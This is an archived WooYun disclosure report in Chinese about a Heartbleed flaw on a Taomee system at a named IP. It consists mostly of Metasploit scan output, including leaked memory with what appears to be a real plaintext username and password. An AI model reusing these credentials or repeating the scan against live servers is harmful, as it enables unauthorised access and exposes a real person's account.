当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116497

漏洞标题:淘米网某系统一处心脏滴血

相关厂商:淘米网

漏洞作者:

提交时间:2015-05-27 15:37

修复时间:2015-06-01 15:38

公开时间:2015-06-01 15:38

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

*

详细说明:

地址:https://61.155.182.85/index.php?r=user%2Findex

[*] 61.155.182.85:443 - Sending Client Hello...
[!] SSL record #1:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  86
[!] 	Handshake #1:
[!] 		Length: 82
[!] 		Type:   Server Hello (2)
[!] 		Server Hello Version:           0x0301
[!] 		Server Hello random data:       55656d2dc40e4d89aa442ce7c5952581562a50500c1008b79e70716bae4611d2
[!] 		Server Hello Session ID length: 32
[!] 		Server Hello Session ID:        5b1e81eef13e56591868c304518d4bd541cf2353998c304fd70546d581aa80b5
[!] SSL record #2:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  948
[!] 	Handshake #1:
[!] 		Length: 944
[!] 		Type:   Certificate Data (11)
[!] 		Certificates length: 941
[!] 		Data length: 944
[!] 		Certificate #1:
[!] 			Certificate #1: Length: 938
[!] 			Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000a5ddab8>, issuer=#<OpenSSL::X509::Name:0x0000000a5dda18>, serial=#<OpenSSL::BN:0x0000000a5dd9a0>, not_before=2014-12-22 10:23:06 UTC, not_after=2019-12-21 10:23:06 UTC>
[!] SSL record #3:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  4
[!] 	Handshake #1:
[!] 		Length: 0
[!] 		Type:   Server Hello Done (14)
[*] 61.155.182.85:443 - Sending Client Hello...
[!] SSL record #1:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  86
[!] 	Handshake #1:
[!] 		Length: 82
[!] 		Type:   Server Hello (2)
[!] 		Server Hello Version:           0x0301
[!] 		Server Hello random data:       55656d38d20a2192519e961771de28fe5b42068bfd450c78ed049b044f4563d9
[!] 		Server Hello Session ID length: 32
[!] 		Server Hello Session ID:        2f75d5474b704759be7d896002aa3a371214cadd73cc6e2de3c6a766f89480db
[!] SSL record #2:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  948
[!] 	Handshake #1:
[!] 		Length: 944
[!] 		Type:   Certificate Data (11)
[!] 		Certificates length: 941
[!] 		Data length: 944
[!] 		Certificate #1:
[!] 			Certificate #1: Length: 938
[!] 			Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000a1b4a18>, issuer=#<OpenSSL::X509::Name:0x0000000a1b49a0>, serial=#<OpenSSL::BN:0x0000000a1b4928>, not_before=2014-12-22 10:23:06 UTC, not_after=2019-12-21 10:23:06 UTC>
[!] SSL record #3:
[!] 	Type:    22
[!] 	Version: 0x0301
[!] 	Length:  4
[!] 	Handshake #1:
[!] 		Length: 0
[!] 		Type:   Server Hello Done (14)
[*] 61.155.182.85:443 - Sending Heartbeat...
[*] 61.155.182.85:443 - Heartbeat response, 46075 bytes
[+] 61.155.182.85:443 - Heartbeat response with leak
[*] 61.155.182.85:443 - Printable info leaked: Ud2pwS-e[;I]f"!98532ED/Am7jPl(sUv {%vaq8k:XfuaIQ.lN+=p!R1B_l.3"L\157>s'E#$GX6t)3thttp/1.1spdy/3.1h2-14uPBfhstbdjl8v17d3uov7Connection: keep-alivePragma: no-cacheCache-Control: no-cacheuser_name=arthurwang&user_pwd=Mogahuli222&vericode=ahIi@YXB'lNm'>z8ode=&loginBtn=%E7%99%BB%E5%BD%95]^6B+(Ay@@hO0RhO0RA+&G+~O0R @H5M$QT\t:fR@O0RO0RRpp`p` pR!jR@  A`  wJO0RO0R  00P#0! p6'`( @ 0;.p"0P*P`+@p`0;.p p@)0p0 p Q`! }Z1R0;.@ `q-7' (PZ1R 6'~`f i @  *00#`f#! (@G.@0@ p0#\J%!]%q!#@  pF.`!' @ !#@!@q0@*00 \J%!]%q`00&_u%bw+syU7v_0**0qR![2pA1VWS\J%!]%q0}D~t78ZY/|@2CAGf!GW<k16}OF)>G&HdllsVM?aV%Xn5u>0glK).|C6+zXrLH~V5Z\oVt"e /PBd?u6t"{iiTq/Cb'w0%3Iz=-r@+07&hO0RhO0R`[1R`[1R`[1R0 P# P``!*@#QH#$<JV@r=common%2Fdata%2FgetTimeSeries&average=0&qoq=0&yoy=0&sum=0&data_info%5B0%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B7%E6%AC%A1%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B0%5D%5Btype%5D=2&data_info%5B0%5D%5Btask_id%5D=22&data_info%5B0%5D%5Brange%5D=1&data_info%5B0%5D%5Bperiod%5D=2&data_info%5B0%5D%5Bfactor%5D=1&data_info%5B0%5D%5Bprecision%5D=0&data_info%5B0%5D%5Bunit%5D=&data_info%5B1%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B7%E6%95%B0&data_info%5B1%5D%5Btype%5D=2&data_info%5B1%5D%5Btask_id%5D=10&data_info%5B1%5D%5Brange%5D=&data_info%5B1%5D%5Bfactor%5D=1&data_info%5B1%5D%5Bprecision%5D=0&data_info%5B1%5D%5Bunit%5D=&data_info%5B2%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B72%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B2%5D%5Btype%5D=2&data_info%5B2%5D%5Btask_id%5D=22&data_info%5B2%5D%5Brange%5D=2&data_info%5B2%5D%5Bperiod%5D=2&data_info%5B2%5D%5Bfactor%5D=1&data_info%5B2%5D%5Bprecision%5D=0&data_info%5B2%5D%5Bunit%5D=&data_info%5B3%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B73%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B3%5D%5Btype%5D=2&data_info%5B3%5D%5Btask_id%5D=22&data_info%5B3%5D%5Brange%5D=3&data_info%5B3%5D%5Bperiod%5D=2&data_info%5B3%5D%5Bfactor%5D=1&data_info%5B3%5D%5Bprecision%5D=0&data_info%5B3%5D%5Bunit%5D=&data_info%5B4%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B74%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B4%5D%5Btype%5D=2&data_info%5B4%5D%5Btask_id%5D=22&data_info%5B4%5D%5Brange%5D=4&data_info%5B4%5D%5Bperiod%5D=2&data_info%5B4%5D%5Bfactor%5D=1&data_info%5B4%5D%5Bprecision%5D=0&data_info%5B4%5D%5Bunit%5D=&data_info%5B5%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B75%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B5%5D%5Btype%5D=2&data_info%5B5%5D%5Btask_id%5D=22&data_info%5B5%5D%5Brange%5D=5&data_info%5B5%5D%5Bperiod%5D=2&data_info%5B5%5D%5Bfactor%5D=1&data_info%5B5%5D%5Bprecision%5D=0&data_info%5B5%5D%5Bunit%5D=&data_info%5B6%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B76%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B6%5D%5Btype%5D=2&data_info%5B6%5D%5Btask_id%5D=22&data_info%5B6%5D%5Brange%5D=6&data_info%5B6%5D%5Bperiod%5D=2&data_info%5B6%5D%5Bfactor%5D=1&data_info%5B6%5D%5Bprecision%5D=0&data_info%5B6%5D%5Bunit%5D=&exprs%5B0%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B7%E6%AC%A1%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B0%5D%5Bunit%5D=%25&exprs%5B0%5D%5Bprecision%5D=2&exprs%5B0%5D%5Bperiod%5D=2&exprs%5B0%5D%5Bexpr%5D=%7B0%7D%2F%7B1%7D*100&exprs%5B1%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B72%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B1%5D%5Bunit%5D=%25&exprs%5B1%5D%5Bprecision%5D=2&exprs%5B1%5D%5Bperiod%5D=2&exprs%5B1%5D%5Bexpr%5D=%7B2%7D%2F%7B1%7D*100&exprs%5B2%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B73%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B2%5D%5Bunit%5D=%25&exprs%5B2%5D%5Bprecision%5D=2&exprs%5B2%5D%5Bperiod%5D=2&exprs%5B2%5D%5Bexpr%5D=%7B3%7D%2F%7B1%7D*100&exprs%5B3%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B74%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B3%5D%5Bunit%5D=%25&exprs%5B3%5D%5Bprecision%5D=2&exprs%5B3%5D%5Bperiod%5D=2&exprs%5B3%5D%5Bexpr%5D=%7B4%7D%2F%7B1%7D*100&exprs%5B4%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B75%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B4%5D%5Bunit%5D=%25&exprs%5B4%5D%5Bprecision%5D=2&exprs%5B4%5D%5Bperiod%5D=2&exprs%5B4%5D%5Bexpr%5D=%7B5%7D%2F%7B1%7D*100&exprs%5B5%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B76%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B5%5D%5Bunit%5D=%25&exprs%5B5%5D%5Bprecision%5D=2&exprs%5B5%5D%5Bperiod%5D=2&exprs%5B5%5D%5Bexpr%5D=%7B6%7D%2F%7B1%7D*100&period=2&from%5B0%5D=2015-03-18&to%5B0%5D=2015-03-18&platform_id=-1&zone_id=-1&server_id=-1&gpzs_id=153&game_id=601TH6nort_type%5D=1&data_info%5B6%5D%5Bdistr_name%5D=%E6%97%A5%E5%9D%877%E6%97%A5%E7%95%99%E5%AD%98%E7%8E%87&data_info%5B6%5D%5Bdimen_name%5D=%E5%B9%B3%E5%8F%B0&data_info%5B6%5D%5Bdistr_by%5D=1&data_info%5B6%5D%5Bdistr_type%5D=3&data_info%5B6%5D%5Bdata%5D=6&data_info%5B6%5D%5Bperiod%5D=1&data_info%5B6%5D%5Bdata_name%5D=%E6%96%B0%E5%A2%9E%E7%94%A8%E6%88%B77%E6%97%A5%E7%95%99%E5%AD%98%E7%8E%87&data_info%5B6%5D%5Btype%5D=2&data_info%5B6%5D%5Btask_id%5D=20&data_info%5B6%5D%5Brange%5D=6&data_info%5B6%5D%5Bfactor%5D=100&data_info%5B6%5D%5Bprecision%5D=2&data_info%5B6%5D%5Bunit%5D=%25&data_info%5B6%5D%5Bcomments%5D=&data_info%5B7%5D%5Bsort_type%5D=1&data_info%5B7%5D%5Bdistr_name%5D=%E6%97%A5%E5%9D%87%E4%BB%98%E8%B4%B9%E7%94%A8%E6%88%B7%E6%95%B0&data_info%5B7%5D%5Bdimen_name%5D=%E5%B9%B3%E5%8F%B0&data_info%5B7%5D%5Bdistr_by%5D=1&data_info%5B7%5D%5Bdistr_type%5D=3&data_info%5B7%5D%5Bdata%5D=7&data_info%5B7%5D%5Bperiod%5D=1&data_info%5B7%5D%5Bdata_name%5D=%E4%BB%98%E8%B4%B9%E7%94%A8%E6%88%B7%E6%95%B0&data_info%5B7%5D%5Btype%5D=1&data_info%5B7%5D%5Bstid%5D=_acpay_&data_info%5B7%5D%5Bsstid%5D=_acpay_&data_info%5B7%5D%5Bop
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

漏洞证明:

RT

修复方案:

*

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-01 15:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无